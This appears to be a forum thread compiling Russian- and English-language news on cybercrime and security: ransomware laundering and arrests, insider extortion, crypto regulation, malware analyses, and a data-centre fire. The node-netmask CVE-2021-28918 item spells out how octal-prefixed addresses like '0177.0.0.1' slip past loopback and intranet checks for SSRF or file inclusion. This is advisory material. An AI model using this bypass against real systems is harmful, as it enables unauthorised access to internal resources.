Криптовалютная биржа Binance подтвердила свое участие в операции украинских правоохранителей по идентификации лиц, связанных с вымогателями Clop и Petya.
Here's how #Binance and international law enforcement were able to take down a $500 million cybercrime ring. https://t.co/V7YeYFzGeh
— Binance (@binance) June 24, 2021Click to expand...
В сообщении Binance говорится о группе киберпреступников под названием
FANCYCAT, которая управляет «высокорисковым обменником» и занимается
отмыванием средств, полученных от операций в даркнете и осуществления атак
шифровальщиков Clop и Petya.
Ущерб от действий FANCYCAT оценили в более $500 млн, связанных с программами-
вымогателями, и «еще несколько миллионов долларов, полученных в результате
других киберпреступлений».
В ходе расследования деятельности FANCYCAT специальное ПО Binance обнаружило
подозрительную активность на площадке. В сотрудничестве с компанией TRM Labs и
сервисом Crystal от Bitfury Group специалисты отследили и проанализировали
активность группировки.
«Мы обнаружили, что она связана не только с отмыванием средств от атаки Clop, но также с полученными от атак Petya и другими деньгами из незаконных источников».
Click to expand...
Анализ помог идентифицировать участников FANCYCAT, заявили в Binance.
Напомним, на прошлой неделе украинские правоохранители сообщили о выявлении
хакеров, стоявших за шифровальщиком Clop.
Источник ForkLog рассказал, что обыски прошли не у представителей хакерской
группировки, а у OTC-трейдеров, через которых проходили биткоины операторов
вируса-вымогателя.
Тогда же ForkLog узнал, что персональные данные фигурантов расследования
украинским правоохранителям могла передать Binance, на которой они проводили
свои сделки.
Несмотря на то, что в киберполиции Украины заявили о пресечении работы
хакерской инфраструктуры, стоящие за Clop злоумышленники позже опубликовали
партию данных, предположительно полученных в результате взлома двух новых
жертв.
Binance уже сотрудничала с украинскими правоохранителями — в 2020 году биржа
содействовала в задержании подозреваемых, причастных к отмыванию $42 млн.
[ Источник ](https://forklog.com/binance-pomogla-vychislit-chlenov- gruppirovki-otmyvavshih-dengi-operatorov-clop-i-petya/)
Сотрудники одного из региональных управлений Федеральной службы безопасности сообщили о поимке 25-летнего мужчины, который пока обвиняется в неправомерном обороте средств платежей. Речь идет о трафере с ником @icysenshi211 (аккаунт уже удален, однако его владелец оставил незначительный цифровой след в Telegram).
Следователям известно, что в конце 2022-го и начале 2023 годов преступник покупал банковские карты, которые использовал для неправомерного приема/перевода денежных средств. Однако после того, как к нему домой наведались с обысками, молодой человек продал имевшееся имущество и решил скрыться из России.
В ответ сотрудники ФСБ провели операцию, которая вынудила мужчину вернуться в РФ — так он снова оказался в руках следователей. В результате следственных действий выяснилось, что подозреваемый оказался трафером, который самостоятельно лил трафик на стиллер и отрабатывал логи, в том числе банковские аккаунты. Кроме того, он по заказу лил трафик за деньги с купленного пластика.
Несколько криптовалютных платформ, работающих в офисном центре «Москва-Сити», оказывают услуги анонимных переводов за границу, в том числе в Великобританию. Об этом говорится в отчете организации Transparency International Russia.
По данным экспертов, в «Москва-Сити» размещается 21 криптовалютная компания. 14 из них — внебиржевые брокеры, занимающиеся обменом наличных рублей на USDT. Восемь платформ производят обмен стейблкоина на фунты стерлингов с возможностью получения наличных в Лондоне.
В число последних входит криптовалютный обменник Suex, попавший под санкции США в сентябре 2021 года из-за связей с разработчиками программ-вымогателей. Несмотря на то, что сайт Suex не работает, операторы Telegram-чата компании до сих пор проводят обменные операции, утверждают исследователи.
Им удалось получить адреса кошельков трех из восьми криптообменников, осуществляющих переводы в Великобританию, — Pridechange, Alfa.exchange и 24ExPay. Проанализировав их, эксперты установили, что с момента создания до 14 декабря 2022 года ежемесячно через один адрес в среднем проходило от $420 000 до $470 000.
В Transparency International подчеркнули, что оценивали только кошельки с USDT в сети Tron, так как полученные адреса в Ethereum имели нулевой или близкий к нулю баланс. Кроме того, каждый обменник использует несколько кошельков, поэтому реальная сумма переводов может быть значительно выше.
По данным аналитического инструмента Elliptic, примерно 21% исходящих платежей Pridechange поступил на адреса, связанные с находящейся под санкциями США биржи Garantex, также располагающейся в «Москва-Сити».
«Когда мы обсуждали перевод средств, мы говорили о суммах, превышающих $15 000, и для обменников не было проблемой предоставить эти деньги наличными в Великобритании в тот же день. Судя по имеющимся доказательствам, значительные суммы средств могут ежемесячно поступать за рубеж с минимальным количество AML-проверок, если таковые вообще проводятся», — отметили эксперты Transparency International.
Click to expand...
source: transparency.org.ru/wp-content/uploads/2023/03/fmcwc-1.pdf
Федеральный суд штата Нью-Джерси приговорил двух участников международной хакерской схемы к штрафу в $352 млн. в пользу Федеральной комиссии по надзору за торговлей ценными бумагами. Брокер Павел Дубовой и его единомышленник Александр Иеременко обязаны выплатить масштабный штраф за участие в исторической афере под руководством пастора Виталия Корчевского.
Согласно документам суда, попавшим в редакцию “Славянского Сакраменто”, подсудимые не явились на суд. Отмечается, что Павел Дубовой является родственником осужденного – Игоря и Аркадия Дубовых, которые в июне прошлого года были приговорены к выплате многомиллионной компенсации за инсайдерскую торговлю.
Александр Иеременко приговорен к выплате штрафа в размере $319 млн., соответственно Павел Дубовой – к 33 млн. Это в три раза больше, чем по версии следователей было “заработано” в масштабной схеме.
Ранее “Славянский Сакраменто” сообщил о том, что пастор-брокер Виталий Корчевский отбывает тюремное заключение в Северной Каролине.
Так называемая схема Корчевского на данный момент является исторической по своим масштабам кражей коммерческих секретов с применением хакерских ресурсов на территории США. В ходе преступной авантюры единомышленниками Корчевского было украдено свыше 100 тыс. пресс-релизов, хранящихся на серверах компании Newswire.
Хотя в названии используется слово «ransom» («выкуп»), RuRansom является не вымогательским ПО, а вайпером.
Специалисты подразделения анализа киберугроз компании VMware, занимающейся разработкой ПО для виртуализации, опубликовали анализ вредоносного ПО RuRansom, которое атакует системы в России.
Впервые о RuRansom рассказали эксперты ИБ-компании Trend Micro в марте нынешнего года. Хотя в названии вредоноса используется слово «ransom», что означает «выкуп», RuRansom является не вымогательским ПО, а вайпером, поскольку безвозвратно уничтожает зашифрованные файлы своих жертв.
В записке с требованием выкупа, которые обычно отображают программы- вымогатели, автор вредоноса сообщает свои истинные мотивы. По его словам, он создал RuRansom с единственной целью – причинить ущерб России.
«Нет никакого способа расшифровать ваши файлы. Никакой оплаты, только ущерб», – сообщается в записке.
Вайпер написан на языке программирования .NET и распространяется подобно червю. Во время выполнения он немедленно вызывает функцию IsRussia(), проверяет публичный IP-адрес системы с помощью сервиса https://api[.]ipify[.]org . По IP-адресу вредонос определяет местоположение машины с помощью еще одного сервиса с URL-структурой https://ip- api[.]com/#<public ip>.
Если геолокационные данные машины не содержат слово «Россия», появляется уведомление «Программу могут запускать только российские пользователи», и выполнение прекращается.
source: blogs.vmware.com/security/2022/04/ruransom-a-retaliatory-wiper.html | trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html
В NPM-пакете node-netmask, насчитывающем около 3 млн загрузок в неделю и используемом в качестве зависимости у более 270 тысяч проектов на GitHub, выявлена уязвимость (CVE-2021-28918), позволяющая обойти проверки, в которых сетевая маска используется для определения вхождения в диапазоны адресов или для фильтрации. Проблема устранена в выпуске node-netmask 2.0.0.
Уязвимость позволяет добиться обработки внешнего IP-адреса как адреса из внутренней сети и наоборот, а при определённой логике использования модуля node-netmask в приложении совершить атаки SSRF (Server-side request forgery),RFI (Remote File Inclusion) и LFI (Local File Inclusion) для обращения к ресурсам во внутренней сети и включения в цепочку выполнения внешних или локальных файлов. Проблема заключается в том, что в соответствии со спецификацией строковые значения адресов, начинающиеся с нуля, должны интерпретироваться как восьмеричные числа, но модуль "node-netmask" не учитывает данную особенность и обрабатывает их как десятичные числа.
Например, атакующий может запросить ресурс, указав значение "0177.0.0.1", которое в десятичном представлении соответствует "127.0.0.1" (число 0177 в восьмеричной системе равно 127 в десятичной), но модуль "node-netmask" отбросит ноль, и обработает 0177.0.0.1" как "177.0.0.1". В приложении при оценке правил доступа не будет определена тождественность с "127.0.0.1" и ресурс будет загружен с "0177.0.0.1" (фактически с 127.0.0.1), несмотря на запрет обращения к адресам loopback-интерфейса.
Аналогично при обращении к приложению атакующий может указать адрес "0127.0.0.1", который тождественен "87.0.0.1", но в модуле "node-netmask" будет обработан как "127.0.0.1" (т.е. приложение разрешит доступ к операциям с 127.0.0.1, несмотря на то, что фактически указан внешний адрес). Подобным образом можно обмануть и проверку обращения к интранет адресам, указав значения подобные "012.0.0.1" (эквивалент "10.0.0.1", но при проверке в node- netmask будет обработан как 12.0.0.1).
Выявившие проблему исследователи называют проблему катастрофичной и приводят несколько сценариев атак, но большинство из них выглядят умозрительными. Например, говорится о возможности атаковать приложение на базе Node.js, устанавливающее внешние соединения для запроса ресурса на основе параметров или данных входного запроса, но конкретно приложение не называется и не детализируется. Даже если найти приложения, выполняющие загрузку ресурсов на основе введённых IP-адресов, не совсем ясно, как можно применить сценарий с отдачей фиктивного ресурса без подсоединения к локальной сети или без получения контроля за "зеркальными" IP-адресами.
Исследователи лишь предполагают, что владельцы 87.0.0.1 (Telecom Italia) и 177.0.0.1 (Brasil Telecom) имеют возможность обойти ограничение доступа к 127.0.0.1. Более реалистичным сценарием является использование уязвимости для обхода различных списков блокировки, реализованных на стороне приложения. Проблема также может применяться для обмена определения интранет-диапазонов в NPM-модуле "private-ip".
• Source: [https://sick.codes/universal-netmas...local-file-inclusion-and- more-cve-2021-28918/](https://sick.codes/universal-netmask-npm-package-used- by-270000-projects-vulnerable-to-octal-input-data-server-side-request-forgery- remote-file-inclusion-local-file-inclusion-and-more-cve-2021-28918/)
• Source: https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
Январская история с незаконным доступом в сеть производителя сетевого оборудования Ubiquiti получила неожиданное продолжение. 1 декабря ФБР и прокуратура Нью-Йорка объявили об аресте бывшего сотрудника Ubiquiti Николаса Шарпа (Nickolas Sharp). Ему предъявлены обвинения в незаконном доступе к компьютерным системам, вымогательстве, мошенничестве с использованием телекоммуникационных систем (wire fraud) и даче ложных показаний сотрудникам ФБР.
Если верить (уже удаленному) профилю в Linkedin, до апреля 2021 года Шарп занимал в Ubiquity должность руководителя Cloud Team, а до этого занимал старшие инженерные должности в таких компаниях, как Amazon и Nike. По словам прокуратуры, Шарп подозревается в том, что в декабре 2020 года незаконно, пользуясь своим служебным положением и, соответственно, административным доступом к компьютерным системам Ubiquiti, склонировал из корпоративного аккаунта на Github на свой домашний компьютер около 150 репозиториев. Чтобы скрыть свой IP адрес, Шарп использовал VPN сервис Surfshark. Однако, после случайного обрыва связи у его интернет-провайдера в логах доступа "засветился" домашний IP-адрес Шарпа.
В январе 2021 года, уже будучи членом группы по расследованию этого "инцидента", Шарп послал в Ubiquiti анонимное письмо, в котором потребовал выплаты 50 биткойнов (~$2m) в обмен за молчание и раскрытие якобы существовавшей уязвимости, через которую был получен доступ. Когда Ubiquiti отказалась платить, Шарп опубликовал часть украденных данных через сервис Keybase. Через несколько дней после этого он отформатировал накопитель ноутбука, через который клонировал данные и переписывался с компанией.
В марте 2021 агенты ФБР провели у Шарпа обыск и изъяли несколько "электронных устройств". Во время обыска Шарп отрицал, что когда-либо пользовался VPN Surfshark, а когда ему представили документы, показывающие, что в июле 2020 года он приобрёл там 27-месячную подписку, сослался на то, что кто-то взломал его PayPal аккаунт.
Через несколько дней после обыска ФБР Шарп связался с Брайаном Кребсом , и
слил ему "инсайд" об инциденте в Ubiquiti, который был опубликован
krebsonsecurity[.]com/2021/03/whistleblower-ubiquiti-breach-catastrophic/
30 марта 2021 года (и возможно, стал одной из причин последовавшего падения акций Ubiquiti на 20%). Больше подробностей можно найти в тексте обвинения: justice[.]gov/usao-sdny/press-release/file/1452706/download
• Source: justice[.]gov/usao-sdny/pr/former-employee-technology-company- charged-stealing-confidential-data-and-extorting
По информации профильных Telegram-каналов, в декабре 2024 года ожидаются
учения по «выключению международного интернета» в некоторых регионах РФ. Об
этом мероприятии РКН сообщил банкам ЦБ РФ.
В ночь с 4 на 5 июля 2023 года Роскомнадзор, Главный радиочастотный центр
(ГРЧЦ, входит в структуру РКН), Центр мониторинга и управления сетью связи
общего пользования (ЦМУ ССОП), операторы связи и владельцы интернет-ресурсов в
РФ проверили на учениях автономную работу
рунета с помощью ТСПУ (технические
средства противодействия угрозам). Представитель РКН пояснил СМИ, что учения
прошли успешно. В 2020 году надзорное ведомство
заявляло, что рунет невозможно
изолировать.
Два источника на телекоммуникационном рынке подтвердили СМИ, что в ходе учений было выполнено «выключение международного интернета». Представитель Роскомнадзора напомнил СМИ, что по закону об устойчивости рунета учения должны проводиться не реже одного раза в год. «Учения прошли успешно», — рассказал СМИ представитель РКН. На вопрос о том, какие задачи преследовали организаторы учений, отключая международный сегмент интернета, в ведомстве не ответили. Один из собеседников на телекоммуникационном рынке напомнил, что декларируемой задачей закона «О суверенном рунете» было сохранение работоспособности российского сегмента Сети при отключении её извне. По его мнению, «в ходе учений могли проверять, правда ли рунет продолжает работать при подобном отключении».
habr.com/ru/news/858608
Хакерская группировка CiberInteligenciaSV опубликовала в открытом доступе
фрагмент исходного кода программного обеспечения криптоматов Chivo в
Сальвадоре. Ранее в сеть утекла база данных 5 млн пользователей национального
криптокошелька.
«На этот раз я принес вам код, который находится в криптоматах Chivo в Сальвадоре. Помните, это государственный криптокошелек, и, как вы знаете, мы не продаем эту информацию, а делимся ею бесплатно», — сказано в обращении CiberInteligenciaSV.
Примечательно, это не первая утечка данных из Chivo. В начале апреля 2024 года в сеть просочилась база пользователей криптокошелька. В ней содержится информация о 5 млн сальвадорцев, включая имена, фамилии, адреса электронной почты и прочее.
Причина утечки на момент написания неизвестна. Над Chivo работали несколько подрядчиков. В феврале 2022 года, например, проект передали компании AlphaPoint, которая должна была исправить все ошибки, допущенные предшественниками.
31 мая, Витебск / Сотрудники областного управления по противодействию киберпреступности совместно со столичными коллегами из МВД и ГУВД установили мошенника, причастного к хищению у новополочанки через интернет более Br62 тыс. Заявление о пропаже денег со счетов пострадавшей поступило в милицию в феврале, сообщили БЕЛТА в отделении информации и общественных связей УВД Витебского облисполкома.
Женщина рассказала: мошенники представились сотрудниками службы безопасности банка. Они сообщили, что на ее счету была совершена несанкционированная операция, которую они могут отменить. Завладев данными счетов новополочанки, преступники сняли деньги с зарплатной карты, а также с депозита.
Во время оперативных мероприятий сыщикам удалось установить, что причастен к преступлению 18-летний учащийся одного из лицеев столицы. "Он занимался обналичиваем похищенных денег. В дальнейшем подозреваемый забрал причитающуюся ему сумму, а остальную часть перевел за границу своим "работодателям". В отношении молодого человека возбуждено уголовное дело. Проверяется его причастность к другим подобным преступлениям. Также проводятся оперативно- разыскные мероприятия, которые установят всех участников криминальной цепочки", - добавили в УВД облисполкома.
Центральный банк России предложил объявить вне закона все операции с криптовалютой в стране, одном из крупнейших в мире центров добычи цифровых токенов.
Согласно проекту предложений, Россия запретит выпуск и операции с криптовалютами, запретит банкам инвестировать в криптовалюты, заблокирует обмен криптовалюты на традиционную валюту и введет юридическую ответственность за использование криптовалюты при покупках.
В 36-страничном отчете, опубликованном в четверг, центральный банк заявил:
«Головокружительный рост и рыночная стоимость криптовалюты определяются в
первую очередь спекулятивным спросом на будущий рост, который создает пузыри».
«Криптовалюты также имеют аспекты финансовых пирамид, потому что рост их цен в
значительной степени поддерживается спросом со стороны новых участников
рынка», — добавил он.
Предложение поступило после того, как высокопоставленный финансовый регулятор ЕС заявил Financial Times, что блок должен запретить метод майнинга, используемый для производства большинства новых биткойнов, энергоемкую практику, известную как «доказательство работы».
Елизавета Данилова, глава отдела финансовой стабильности центрального банка, заявила, что россиянам по-прежнему будет разрешено владеть криптовалютами за границей, но предупредила, что регулирующие органы будут отслеживать их активы.
«Мы считаем очень важным запретить использование российской финансовой инфраструктуры для получения криптовалюты. Мы думаем, что это поможет снять значительную часть рисков и гарантировать, что криптовалюта не будет такой популярной», — сказала она, сообщает «Интерфакс».
Объявление, похоже, не повлияло на цену биткойна, которая в четверг выросла на 1,8% по отношению к доллару. После того, как в сентябре прошлого года Китай объявил всю криптовалютную деятельность незаконной, валюта упала, но через несколько дней восстановилась.
Эльвира Набиуллина, глава Центрального банка России, является давним скептиком в отношении криптовалют.
«Существуют большие риски использования криптовалют для отмывания денег и незаконных операций, и мы потратили много усилий на очистку финансовой системы от незаконных и сомнительных операций», — сказала она в интервью FT в прошлом году. «Значительное количество банковских лицензий, которые мы отозвали, были связаны с тем, что они занимались подобными сомнительными вещами».
«Мы уже победили эту проблему и не хотим впускать ее через черный ход».
В своем отчете Центральный банк России заявил, что криптовалюта увеличит и без
того горячую инфляцию, «ограничив суверенитет денежно-кредитной политики», и
предупредил, что ее можно использовать «для обслуживания незаконной
деятельности».
По данным центрального банка, в прошлом году россияне совершили около 5 миллиардов долларов в транзакциях с криптовалютой.
Россия также развила процветающую горнодобывающую промышленность после того, как Китай в прошлом году запретил эту практику. Низкие цены на электроэнергию и низкие температуры в Восточной Сибири стали благом для горнодобывающих компаний, которые полагаются на огромные центры обработки данных, заполненные быстрыми компьютерами. Доля добычи биткойнов в России выросла до 11% в прошлом году с 6,8% в 2020 году.
Согласно данным Кембриджского центра альтернативных финансов, Россия является
третьей по величине страной по добыче криптовалюты после США и Казахстана.
Huobi, одна из крупнейших торговых площадок по объему, заявила в сентябре, что
на российских пользователей приходится 10% торговли наличными компании.
Но российский центральный банк заявил, что добыча полезных ископаемых
потенциально может нанести ущерб попыткам Москвы обезуглерожить свою
ресурсоемкую экономику и создать риски для энергоснабжения страны.
В октябре прошлого года министерство энергетики России заявило, что рассматривает вопрос о введении тарифов на майнеров криптовалюты после значительного всплеска энергопотребления в таких регионах, как Иркутск, в течение нескольких месяцев после запрета Китая.
Губернатор Иркутской области предупредил кабинет министров о «лавинообразном всплеске энергопотребления» из-за наплыва майнеров, но позже заявил, что добычу полезных ископаемых следует отнести к «предпринимательской деятельности».
К январю майнинг был связан с перебоями в подаче электроэнергии в СМИ, специализирующихся на цифровых активах.
ft.com/content/54433e18-7442-4804-9fec-f0f934bf8b4e
С сегодняшнего дня владельцы таких каналов должны пройти «верификацию».
Что нужно делать: заполняете форму — получаете код, который нужно закинуть в свой канал, после чего Роскомнадзор вынесет решение о внесении канала в реестр.
Последствия, если вы забьете на регистрацию: запрет на сбор донатов и продажу рекламы — со следующего года будут штрафовать рекламодателей, которые рекламируются в каналах не из реестра.
Также вы обязаны разместить в описании канала ссылку на запись в реестре РКН после включения в реестр.
t.me/mintsifry/2391
Афера в стиле лучших кинопроизведений Гая Ричи закончилась неудачно для молодого специалиста.
Интересная ситуация произошла в 2018 году в британском городе Оксфорд. Группировка вымогателей совершила кибератаку с последующим шифрованием данных на одну из местных компаний. Руководство предприятия приняло решение заплатить выкуп злоумышленникам, так как потеря данных нанесла бы компании серьёзный удар.
Эшли Лайлс, который в тот момент работал в этой компании IT-аналитиком, принимал непосредственное участие в обеспечении кибербезопасности фирмы, и настраивал канал связи между руководством компании и вымогателями. Ситуация довольно стандартная, однако Лайлс решил воспользоваться своим рабочим положением, чтобы перехватить выкуп, предназначенный настоящим злоумышленникам.
Чтобы обмануть компанию, Лайлс выдал себя за одного из членов киберпреступной группировки и попытался перенаправить платёж, заменив криптовалютный кошелёк хакеров на свой собственный, отправив его в поддельном письме на электронную почту фирмы. Кроме того, имея полный доступ к корпоративным документам, мужчина использовал их для шантажа своего руководства, чтобы ускорить перевод средств на свой счёт.
Впрочем, своими действиями Лайс лишь отпугнул руководство, которое изначально склонялось к переводу средств. По итогу, компания не подчинилась выдвинутым злоумышленникам требованиям, поэтому выкуп не достался ни Лайлсу, ни настоящим хакерам.
Параллельно компания начала вести независимое внутреннее расследование с участием британского полицейского отделения SEROCU, во время которого и выяснилось, что Лайлс неоднократно получал доступ к конфиденциальным данным компании, в том числе со своего домашнего адреса.
Хотя Лайлс предпринял меры предосторожности, стерев все данные со своих личных устройств после того, как узнал о продвижении в ходе расследования, правоохранители изъяли его компьютер и успешно восстановили необходимые улики.
Сначала Лайлс настойчиво отрицал свою причастность, но во время недавнего судебного слушания в Королевском Суде Ридинга наконец признался в содеянном. Спустя пять лет после произошедшего.
Согласно законодательству Великобритании, незаконный доступ к компьютеру может повлечь за собой тюремное заключение до двух лет, тогда как шантаж наказывается максимальным сроком в 14 лет.
По итогу, 28-летний Лайлс был приговорён к трём годам и семи месяцам лишения свободы «за шантаж и несанкционированный доступ к компьютеру с намерением совершить другие преступления».
Данная история подчёркивает важность этики и честности в мире кибербезопасности. Хотя Эшли Лайлс начал свою работу в компании с целью обеспечения её безопасности, он воспользовался своим положением для собственной выгоды. Нарушение законов и злоупотребление полномочиями не только неэтично, но и может привести к серьёзным последствиям.
• Source: .securitylab.ru/news/540125.php
"The US Department of Justice has indicted a Ukrainian man for using a malware botnet to brute force computer logon credentials and then selling them on a criminal remote access marketplace.
The indictment alleges that Glib Oleksandr Ivanov-Tolpintsev operated a malware botnet that collected login credentials for multiple computers simultaneously using brute force techniques.
Some threat actors used the "Marketplace" dark web site to sell stolen remote access credentials while other bought them for future cyberattacks
Through Jabber chats obtained from an investigation into the Marketplace, the FBI could chronicle Ivanov-Tolpintsev's attempts to become a seller on the dark web marketplace.
"For example, in chats dated May 23, 2017, Ivanov-Tolpintsev asked about the requirements to become a seller on the Marketplace," explained a previous complaint out of the District of Florida.
"Conspirator # 1 explained that sellers must have a database of credentials from at least 5,000 servers, and the ability to upload 500 credentials to the Marketplace each week."
"Ivanov-Tolpintsev responded that he planned to be able to satisfy those requirements."
The DOJ states that Ivanov-Tolpintsev claimed to brute force 2,000 logins per week using his botnet, which was then listed on a dark web remote access marketplace known as the "Marketplace."
Under the alias "Mars," Ivanov-Tolpintsev allegedly put up for sale access to 6,704 computers, where he earned $ 82,648.
Threat actors could then use these sold credentials to perform a wide range of attacks, including data theft, ransomware attacks, or to cover the trails of other attacks.
Ivanov-Tolpintsev was arrested by Polish authorities and has since been extradited to the USA. He now faces charges of conspiracy, trafficking in unauthorized access devices, and trafficking in computer passwords.
If convicted of all charges, he faces a maximum penalty of 17 years in prison.
The indictment alleges that Glib Oleksandr Ivanov-Tolpintsev operated a
malware botnet that collected login credentials for multiple computers
simultaneously using brute force techniques."
https://www.bleepingcomputer[.]com/...ted-for-selling-2-000-stolen-logins-per- week/
[In August last year, it was reported](https://www.hackread.com/musk-confirms- russian-hacker-tesla-worker-malware-attack/) that a Russian threat actor Egor Igorevich Kriuchkov was arrested for luring a Tesla employee into infecting one of the company’s protected computers with malware.
The employee, whose name was not revealed reported the incident to the company as a result of which Kriuchkov was arrested by the FBI.
It is worth noting that the employee who happened to be a non-US citizen worker at Tesla Gigafactory in Nevada, United States was offered $1 million in Bitcoin if they facilitated the attack.
On the other hand, Kriuchkov also planned to carry out Distributed Denial of Service [(DDoS) attack](https://www.hackread.com/aws-largest-ever-ddos-attack- of-2-3-tbps/) which would have diverted the company’s attention, paving way for the hacker to extract critical corporate data from the company and hold it for ransom.
[](https://www.hackread.com/wp-
content/uploads/2020/08/elon-musk-confirms-russian-hackers-failed-attempt-to-
conspire-with-tesla-employee-1.jpg)
Elon Musk confirmed the incident back in August on Twitter.
Now, according to the Department of Justice, Kriuchkov has pleaded guilty to
one count of conspiracy to intentionally cause damage to a protected computer
and is scheduled to be sentenced on May 10th, 2021.
A Russian national pleaded guilty in federal court today for conspiring to travel to the United States to recruit an employee of a Nevada company into a scheme to introduce malicious software into the company’s computer network, said a press release issued by DOJ on Thursday, March 18, 2021.
Click to expand...
“The swift response of the company and the FBI prevented a major exfiltration of the victim company’s data and stopped the extortion scheme at its inception,” said Acting Assistant Attorney General Nicholas L. McQuaid of the Justice Department’s Criminal Division.
Click to expand...
It is unclear how many years Kriuchkov will serve in prison however due to his plea deal chances are that they will get away with a lighter sentence.
ФБР уговаривало не платить, но в компании решили, что спокойствие клиентов важнее.
Компания JBS, крупный мировой производитель мяса, заявила о том, что выплатила $11 млн выкупа в биткоинах в результате атаки вируса-вымогателя. В результате инцидента данные предприятия были зашифрованы, что привело к сложностям в работе в США или Австралии.
Несмотря на то, что ФБР против того, чтобы компании выплачивали выкуп, потому что это стимулирует и других злоумышленников предпринимать попытки получить легкие деньги, в JBS заявили, что после консультаций с ИБ-специалистами решились на выплату, потому что ценят спокойствие и безопасность своих клиентов. Обычно, напомним, шифрование данных в случае атаки вируса-вымогателя сопровождается их утечкой.
Интересно, что в JBS сообщили, что смогли быстро преодолеть послествия атаки, потому что четко соблюдали протоколы кибербезопасности; также у них были собственные надежно зашифрованные резервные копии. Компания сообщила, что тратит на ИТ ежегодно порядка $200 млн, ее штат ИТ-специалистов составляет более 850 специалистов.
Издание ZDNet напоминает, что в настоящее время появились услуги типа RaaS (ransomware as a service), сервис, в рамках которого вирус-вымогатель предоставляется всем желающим.
Отмечается, что атак вирусов-вымогателей в последние три года стало заметно больше — с момента появление в 2017 году вирусов WannaCry и NotPetya их популярность только растет.
Так, аналитики из компании Cybersecurity Ventures подсчитали, что ущерб от вирусов-вымогателей составляет в настоящее время порядка $20 млрд, с 2015 года эта цифра выросла в 57 раз. А в Palo Alto Networks выяснили, что средняя цена выкупа увеличилась с $115 123 в 2019 году, до $312 493 в прошлом 2020-м, рост за год составил 171%.
Источник: https://www.it-world.ru/cionews/security/175739.html
ИсследователиCyFirma обнаружили новую RaaS [Synapse](https://www.cyfirma.com/research/synapse-ransomware-technical- analysis/)[,](https://www.cyfirma.com/research/synapse-ransomware-technical- analysis/) реализуемую на хакерских форумах с февраля 2024 года как одну из самых быстрых на сегодняшний день ransomware.
Одна из основных замеченных особенностей вредоносного ПО - это выполнение проверки часового пояса и языка системы, приводящая к завершению работы, если обнаружено, что какая-либо из них базируется вИране.
Кроме того,Synapse шифрует данные телеметрии перед отправкой их на сервер
C2 с использованием специального алгоритма с примечательной входной строкой:
“Chuong Dong looks like
Та же строка используется в методологии шифрования семействаBabuk Ransomware.
Учитывая утечку исходниковBabuk Ransomware в 2021 году, налицо все признаки того, что владельцыSynapse использовали функциональные возможности его кода или вообще могли быть связи с его разработчиками.
Анализ показывает, чтоSynapseCrypter позаимствовал множество функций и уLambda Ransomware, связанной с группойVoidCrypt.
Изученная стабильная версияSynapse 1.0.0 представляет новый мощный штамм программы-вымогателя с расширенными функциями, с C2, сборщиком полезной нагрузки и системой чата на базеTOR.
Ransomware предотвращает повреждение файлов, использует схемы быстрого шифрования и предлагает гибкие режимы, включая пользовательские параметры.
Помимо упомянутых функций,SynapseCrypter может похвастаться дополнительными возможностями.
Он включает в себя функции сетевого сканирования и возможность репликации на сетевых устройствах с использованием жестко запрограммированных учетных данных, хранящихся в его конфигурации.
SynapseCrypter использует поискNTFS для просмотра файлов иCHACHA8 для их шифрования, проверяет наличие файлов и папок в белом списке перед шифрованием, поддерживает очистку теневых копий и самоудаление.
После шифрованияSynapse производит переименование файлов, изменение обоев и значков, а также удаление данных.
В отличие от некоторых других программ-вымогателей,Synapse не задействует сайт утечки данных. Вместо этого его операторы взаимодействуют с жертвами черезTOR для переговоров о выкупе.
Ресерчеры отмечают, что появлениеSynapse RaaS подчеркивает динамично меняющийся ландшафт угроз ransomware, где новая ransomware с его избирательным подходом к шифрованию и заимствованными функциями у других штаммов представляет серьезную угрозу.
A new fire that occurred at 7 pm on Friday March 19 at the OVH Strasbourg website led the company to shut down the Strasbourg 1 (SBG 1) data center, which had been partially set on fire in the SBG 2 fire on the 10th. March. The new fire started in a battery storage room. There were 300 batteries of 25 kg in it. The company reported that “there are no injured people to mourn among OVHcloud teams or their partners. Two security guards who were disturbed by the smoke were examined by health professionals ”.
The fire was quickly controlled by the firefighters. With the mobilization of 130 people, operations to put the infrastructure back into production after the first fire were halted overnight. SBG 1, prepared servers were restarted, to serve as a precaution. In the process, OVHCloud announced that all SBG 1 servers will definitely be moved to other data centers hosted on the Strasbourg website, or on its Gravelines and Roubaix campuses. The decision was apparently taken at the direction of the company's insurer. The origin of this new incident has not yet been specified.
OVH had begun on the night of March 17 to gradually restart the still functional machines at the Strasbourg 3 data center - which is in the same area - after checking the status of each one. Yesterday, March 22, at 1 pm, 72% of virtual private server (VPS) services, 79% of bare metal servers and 86% of PCI services were already reactivated. The company provides a console to monitor the restart of each server in real time.
On the afternoon of March 22, the company's CEO, Octave Klaba, posted a third video on Twitter to take stock of the situation. He said 5,000 servers had been received since the incident and made available to customers. “We are currently building 450 servers a day at our factory in Croix. The goal is to build 15,000 over the next three to four weeks to fully compensate for the destroyed machines, ”said Klaba.
Regarding the ongoing investigation into the fire, he insisted on the number of interested parties: judicial police, insurers, independent experts, bailiffs… “This investigation will take several months. We will obviously share all the conclusions, ”added the CEO. But Octave Klaba intends to learn the lessons of the disaster without delay: “We decided to create a laboratory to work on different cases of fire in a datacenter, on the capacity of doors and partitions to contain the fire and on the most effective methods of extinguishing according to the case. We intend to publish these methods in open source to benefit as many companies as possible “.
(Cisoadvisor)
Злоумышленники с помощью вредоносной программы вмешивались в работу компьютера бухгалтера и выводили деньги на фиктивные счета.
В отдел противодействия киберпреступлениям в Ивано-Франковской области обратился директор одного из предприятий области и сообщил о похищении денег со счета.
Киберполицейские установили, что неизвестные прислали письмо с вредоносным программным кодом на электронную почту общества. Программа давала доступ к удаленному управлению компьютером бухгалтера учреждения, на котором была установлена автоматизированная система "клиент-банк".
Имея возможность удаленного управления банковскими счетами, злоумышленники в течение месяца подменяли реквизиты и счета контрагентов общества. Таким образом правонарушители выводили деньги на подконтрольные фиктивные предприятия.
В результате - со счета заявителя злоумышленники похитили более миллиона гривен. Киберполицейские в ходе оперативных мероприятий отследили фиктивные предприятия-посредники и банковские счета, на которые переводились деньги.
Совместно с работниками центрального аппарата Департамента киберполиции, представителями служб безопасности банковских учреждений и благодаря своевременному обращению похищенные деньги заблокировали и вернули потерпевшему.
Сейчас сотрудники полиции проверяют причастность трех человек к совершению указанного преступления.
Следователи полиции Ивано-Франковска открыли уголовное производство по ст. 361 (Несанкционированное вмешательство в работу компьютеров, автоматизированных систем, компьютерных сетей или сетей электросвязи) Уголовного кодекса Украины. Злоумышленникам может грозить до шести лет лишения свободы.
